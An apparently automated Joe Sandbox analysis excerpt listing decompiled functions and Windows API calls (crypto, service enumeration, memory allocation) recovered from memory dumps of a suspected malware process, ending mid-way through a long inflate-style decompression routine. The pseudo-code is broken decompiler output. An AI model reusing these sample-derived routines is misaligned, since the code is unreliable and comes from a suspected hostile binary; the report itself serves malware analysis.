Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_120000_certcache.jbxd

Function 00121C91, Relevance: 1.3, APIs: 1, Instructions: 76

APIs

VirtualAlloc.KERNELBASE ref: 00121CD7

Memory Dump Source

Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_120000_certcache.jbxd

Non-executed Functions

Function 0013259B, Relevance: 12.1, APIs: 8, Instructions: 66encryption

APIs

RtlAllocateHeap.NTDLL ref: 001325A4
CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 001325CA
memcpy.NTDLL(?,?), ref: 001325DE
CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 001325FA
CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000,?,?), ref: 00132616
CryptDestroyHash.ADVAPI32(?,?,?), ref: 00132629
GetProcessHeap.KERNEL32(00000000), ref: 0013263C
HeapFree.KERNEL32(00000000), ref: 00132643

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00132505, Relevance: 6.0, APIs: 4, Instructions: 29
encryption

C-Code - Quality: 37%

			E00132505(void* __eax, void* __ebx, void* __edi) {
				void* _t18;
				void** _t20;
				void* _t22;

				 *((intOrPtr*)(_t22 - 0x14)) = 0x14;
				 *0x13c068( *((intOrPtr*)(_t22 - 4)), 2, __ebx + 0x60, __eax);
				_t18 =  !=  ? 1 : __edi;
				_t20 =  *(_t22 + 8);
				 *0x13c048( *((intOrPtr*)(_t22 - 4)));
				if(_t18 == 0) {
					HeapFree(GetProcessHeap(), 0,  *_t20);
					 *_t20 = 0;
					_t20[1] = 0;
				}
				return _t18;
			}

0x00132505
0x00132516
0x00132523
0x00132526
0x0013252c
0x00132534
0x00132541
0x00132547
0x0013254d
0x0013254d
0x0013255c

APIs

CryptGetHashParam.ADVAPI32(?,00000002,?), ref: 00132516
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0013252C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0013253A
HeapFree.KERNEL32(00000000), ref: 00132541

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013985F, Relevance: 3.0, APIs: 2, Instructions: 34

APIs

EnumServicesStatusExW.ADVAPI32 ref: 0013985F
OpenServiceW.ADVAPI32(?,?,00000001), ref: 0013989D

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001397F3, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

EnumServicesStatusExW.ADVAPI32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 0013980A
GetLastError.KERNEL32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 00139818
CloseServiceHandle.ADVAPI32 ref: 0013996E

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00132E6A, Relevance: 1.8, Strings: 1, Instructions: 509
Crypto

C-Code - Quality: 50%

			E00132E6A(void* __ebx, void* __fp0) {
				signed int _t1688;
				signed int _t1692;
				void* _t2075;
				signed int _t2086;
				signed int _t2465;
				void* _t2870;

				_t2075 = __ebx;
				 *(_t2870 - 0x1c) = 0xffffffff;
				 *(_t2870 - 4) =  *(_t2870 + 0xc);
				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
				} else {
					 *(_t2870 - 0xf0) = 0xffffffff;
				}
				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
					 *( *(_t2870 + 0x1c)) = 0;
					 *( *(_t2870 + 0x10)) = 0;
					_t1688 = 0xfffffffd;
				} else {
					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
					_t1692 =  *( *(_t2870 + 8) + 0x3c);
					 *(_t2870 - 0x7c) = _t1692;
					_t2086 =  *(_t2870 + 8);
					_t2465 =  *_t2086;
					 *(_t2870 - 0xf8) = _t2465;
					if( *(_t2870 - 0xf8) <= 0x35) {
						_t50 =  *(_t2870 - 0xf8) + 0x1355b0; // 0xcccccc20
						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M00135528))) {
							case 0:
								 *( *(_t2870 + 8) + 0xc) = 0;
								 *( *(_t2870 + 8) + 8) = 0;
								 *(_t2870 - 0x24) = 0;
								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
								 *(_t2870 - 8) =  *(_t2870 - 0x28);
								 *(_t2870 - 0xc) =  *(_t2870 - 8);
								 *( *(_t2870 + 8) + 0x1c) = 1;
								 *( *(_t2870 + 8) + 0x10) = 1;
								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
									goto L48;
								} else {
									goto L9;
								}
								goto L600;
							case 1:
								if(0 != 0) {
									L11:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 1;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L10;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L18:
										L20:
										if(0 != 0) {
											L9:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L20;
											} else {
												L10:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 8) = 0;
													goto L18;
												} else {
													goto L11;
												}
											}
										} else {
											goto L21;
										}
									}
								}
								goto L600;
							case 2:
								if(0 != 0) {
									L23:
									 *(_t2870 - 0x1c) = 1;
									_t2086 =  *(_t2870 + 8);
									 *_t2086 = 2;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L22;
									} else {
										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										L30:
										L32:
										if(0 != 0) {
											L21:
											_t2465 =  *(_t2870 - 4);
											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
												goto L32;
											} else {
												L22:
												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
												if(_t1692 == 0) {
													 *( *(_t2870 + 8) + 0xc) = 0;
													goto L30;
												} else {
													goto L23;
												}
											}
										} else {
											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
												 *(_t2870 - 0x110) = 1;
											} else {
												 *(_t2870 - 0x110) = 0;
											}
											_t1692 =  *(_t2870 - 0x110);
											 *(_t2870 - 0x10) = _t1692;
											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
											if(_t2086 == 0) {
												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
												if(1 > 0x8000) {
													L42:
													 *(_t2870 - 0x10c) = 1;
												} else {
													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
													if( *(_t2870 - 0x88) + 1 < 1) {
														goto L42;
													} else {
														 *(_t2870 - 0x10c) = 0;
													}
												}
												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
												 *(_t2870 - 0x10) = _t2086;
											}
											if( *(_t2870 - 0x10) == 0) {
												goto L48;
											} else {
												goto L45;
											}
										}
									}
								}
								goto L600;
							case 3:
								if(0 != 0) {
									goto L51;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L50;
									} else {
										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L58;
									}
								}
								goto L600;
							case 4:
								if(0 != 0) {
									goto L67;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L66;
									} else {
										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L74;
									}
								}
								goto L600;
							case 5:
								if(0 != 0) {
									goto L86;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L85;
									} else {
										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L93;
									}
								}
								goto L600;
							case 6:
								if(0 != 0) {
									goto L101;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L100;
									} else {
										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L108;
									}
								}
								goto L600;
							case 7:
								if(0 != 0) {
									goto L141;
								} else {
									goto L140;
								}
								goto L600;
							case 8:
								if(0 == 0) {
								}
								goto L165;
							case 9:
								if(0 != 0) {
									goto L193;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L192;
									} else {
										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L200;
									}
								}
								goto L600;
							case 0xa:
								if(0 != 0) {
									goto L215;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L214;
									} else {
										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L222;
									}
								}
								goto L600;
							case 0xb:
								if(0 != 0) {
									goto L293;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L292;
									} else {
										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L300;
									}
								}
								goto L600;
							case 0xc:
								if(0 == 0) {
								}
								goto L318;
							case 0xd:
								if(0 != 0) {
									goto L325;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L324;
									} else {
										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L332;
									}
								}
								goto L600;
							case 0xe:
								if(0 == 0) {
								}
								goto L344;
							case 0xf:
								if(0 != 0) {
									goto L367;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L366;
									} else {
										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L374;
									}
								}
								goto L600;
							case 0x10:
								if(0 != 0) {
									goto L390;
								} else {
									goto L389;
								}
								goto L600;
							case 0x11:
								if(0 != 0) {
									goto L424;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L423;
									} else {
										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L431;
									}
								}
								goto L600;
							case 0x12:
								if(0 != 0) {
									goto L454;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L453;
									} else {
										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L461;
									}
								}
								goto L600;
							case 0x13:
								if(0 != 0) {
									goto L479;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L478;
									} else {
										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L486;
									}
								}
								goto L600;
							case 0x14:
								if(0 != 0) {
									goto L536;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L535;
									} else {
										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L543;
									}
								}
								goto L600;
							case 0x15:
								if(0 == 0) {
								}
								goto L581;
							case 0x16:
								if(0 == 0) {
								}
								goto L244;
							case 0x17:
								if(0 == 0) {
								}
								L45:
								 *(_t2870 - 0x1c) = 0xffffffff;
								_t2465 =  *(_t2870 + 8);
								 *_t2465 = 0x24;
								goto L600;
							case 0x18:
								if(0 == 0) {
								}
								goto L495;
							case 0x19:
								if(0 != 0) {
									goto L146;
								} else {
									goto L144;
								}
								goto L600;
							case 0x1a:
								if(0 == 0) {
								}
								goto L114;
							case 0x1b:
								if(0 == 0) {
								}
								goto L149;
							case 0x1c:
								if(0 != 0) {
									goto L555;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L554;
									} else {
										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L562;
									}
								}
								goto L600;
							case 0x1d:
								if(0 != 0) {
									goto L570;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L569;
									} else {
										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L577;
									}
								}
								goto L600;
							case 0x1e:
								if(0 != 0) {
									goto L122;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L121;
									} else {
										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L129;
									}
								}
								goto L600;
							case 0x1f:
								if(0 != 0) {
									goto L135;
								} else {
									goto L134;
								}
								goto L600;
							case 0x20:
								if(0 != 0) {
									L504:
									 *(_t2870 - 0x1c) = 2;
									_t1692 =  *(_t2870 + 8);
									 *_t1692 = 0x35;
								} else {
									L503:
									_t2465 =  *(_t2870 - 0x14);
									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
										L502:
										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
										_t2086 =  *(_t2870 - 0x10) - 1;
										 *(_t2870 - 0x10) = _t2086;
										if( *(_t2870 - 0x118) == 0) {
											L350:
											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
											if(_t1747 < 4) {
												L352:
												if( *(_t2870 - 8) >= 0xf) {
													L381:
													goto 0x140bac;
													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
													 *(_t2870 - 0x3c) = _t2519;
													if( *(_t2870 - 0x3c) < 0) {
														 *(_t2870 - 0x50) = 0xa;
														do {
															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
															_t2519 =  *(_t2870 - 0x50) + 1;
															 *(_t2870 - 0x50) = _t2519;
														} while ( *(_t2870 - 0x3c) < 0);
													} else {
														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
													 *(_t2870 - 8) = _t1747;
													_t2086 = 0;
													if(0 != 0) {
														goto L352;
													} else {
														if( *(_t2870 - 0x10) < 0x100) {
															L389:
															_t2465 =  *(_t2870 - 0x14);
															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
																_t2086 =  *(_t2870 - 0x14) + 1;
																 *(_t2870 - 0x14) = _t2086;
																goto L417;
															} else {
																L390:
																 *(_t2870 - 0x1c) = 2;
																_t1692 =  *(_t2870 + 8);
																 *_t1692 = 0x18;
															}
														} else {
															goto L418;
														}
													}
												} else {
													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														goto L381;
													} else {
														L354:
														goto 0x140b73;
														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
														 *(_t2870 - 0x3c) = _t2534;
														if( *(_t2870 - 0x3c) < 0) {
															if( *(_t2870 - 8) <= 0xa) {
																goto L365;
															} else {
																 *(_t2870 - 0x50) = 0xa;
																while(1) {
																	goto 0x140b86;
																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
																	_t2534 =  *(_t2870 - 0x50) + 1;
																	 *(_t2870 - 0x50) = _t2534;
																	if( *(_t2870 - 0x3c) >= 0) {
																		break;
																	}
																	_t1747 =  *(_t2870 - 0x50) + 1;
																	if( *(_t2870 - 8) >= _t1747) {
																		continue;
																	}
																	break;
																}
																if( *(_t2870 - 0x3c) < 0) {
																	goto L365;
																} else {
																	goto L378;
																}
															}
														} else {
															_t1747 =  *(_t2870 - 0x3c) >> 9;
															 *(_t2870 - 0x50) = _t1747;
															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
																L365:
																_t2086 =  *(_t2870 - 4);
																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																	goto L376;
																} else {
																	L366:
																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																	if(_t2465 == 0) {
																		 *(_t2870 - 0xc4) = 0;
																		L374:
																		L376:
																		if(0 != 0) {
																			goto L365;
																		} else {
																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																			_t1747 =  *(_t2870 - 8) + 8;
																			 *(_t2870 - 8) = _t1747;
																			if( *(_t2870 - 8) < 0xf) {
																				goto L354;
																			} else {
																				goto L378;
																			}
																		}
																	} else {
																		L367:
																		 *(_t2870 - 0x1c) = 1;
																		_t1692 =  *(_t2870 + 8);
																		 *_t1692 = 0x17;
																	}
																}
															} else {
																L378:
																goto L381;
															}
														}
													}
												}
											} else {
												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
												if(_t2086 >= 2) {
													if( *(_t2870 - 8) < 0xf) {
														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
														 *(_t2870 - 0xc) = _t1747;
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
													}
													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
													if( *(_t2870 - 0x38) < 0) {
														 *(_t2870 - 0x54) = 0xa;
														do {
															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
															 *(_t2870 - 0x38) = _t2164;
															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
														} while ( *(_t2870 - 0x38) < 0);
													} else {
														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
													 *(_t2870 - 8) = _t1863;
													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
														if( *(_t2870 - 8) < 0xf) {
															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
															 *(_t2870 - 0xc) = _t1863;
															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														}
														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
														if( *(_t2870 - 0x38) < 0) {
															 *(_t2870 - 0x54) = 0xa;
															do {
																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
																 *(_t2870 - 0x38) = _t2171;
																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
															} while ( *(_t2870 - 0x38) < 0);
														} else {
															_t1868 =  *(_t2870 - 0x38) >> 9;
															 *(_t2870 - 0x54) = _t1868;
														}
														goto 0x140c1e;
														asm("int3");
														 *(_t2870 - 0xc) = _t1868 >> _t2171;
														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
														if(_t1872 == 0) {
															_t2086 =  *(_t2870 - 0x14);
															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
															L417:
															goto L350;
														} else {
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
															goto L418;
														}
													} else {
														L418:
														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
														if( *(_t2870 - 0x10) != 0x100) {
															_t1769 =  *(0x13ac1c +  *(_t2870 - 0x10) * 4);
															 *(_t2870 - 0x24) = _t1769;
															_t2180 =  *(_t2870 - 0x10);
															_t2566 =  *(0x13b634 + _t2180 * 4);
															 *(_t2870 - 0x10) = _t2566;
															if( *(_t2870 - 0x24) == 0) {
																L437:
																if( *(_t2870 - 8) >= 0xf) {
																	L468:
																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																	 *(_t2870 - 0x44) = _t2182;
																	if( *(_t2870 - 0x44) < 0) {
																		 *(_t2870 - 0x4c) = 0xa;
																		do {
																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
																			_t2182 =  *(_t2870 - 0x4c) + 1;
																			 *(_t2870 - 0x4c) = _t2182;
																		} while ( *(_t2870 - 0x44) < 0);
																	} else {
																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
																	}
																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
																	 *(_t2870 - 0xc) = _t1769;
																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L437;
																	} else {
																		 *(_t2870 - 0x24) =  *(0x13b0a0 +  *(_t2870 - 0x28) * 4);
																		_t2592 =  *(_t2870 - 0x28);
																		_t1789 =  *(0x13b120 + _t2592 * 4);
																		 *(_t2870 - 0x28) = _t1789;
																		if( *(_t2870 - 0x24) == 0) {
																			L493:
																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
																			_t2465 =  *(_t2870 - 0x28);
																			if(_t2465 <=  *(_t2870 - 0x7c)) {
																				L498:
																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
																				 *(_t2870 - 0x30) = _t2211;
																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
																					_t2211 =  *(_t2870 - 0x30);
																					 *(_t2870 - 0xf4) = _t2211;
																				} else {
																					_t1789 =  *(_t2870 - 0x14);
																					 *(_t2870 - 0xf4) = _t1789;
																				}
																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
																						L522:
																						goto L523;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
																						do {
																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
																							_t2211 =  *(_t2870 - 0x14) + 8;
																							 *(_t2870 - 0x14) = _t2211;
																							_t2612 =  *(_t2870 - 0x30) + 8;
																							 *(_t2870 - 0x30) = _t2612;
																							_t1789 =  *(_t2870 - 0x30);
																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
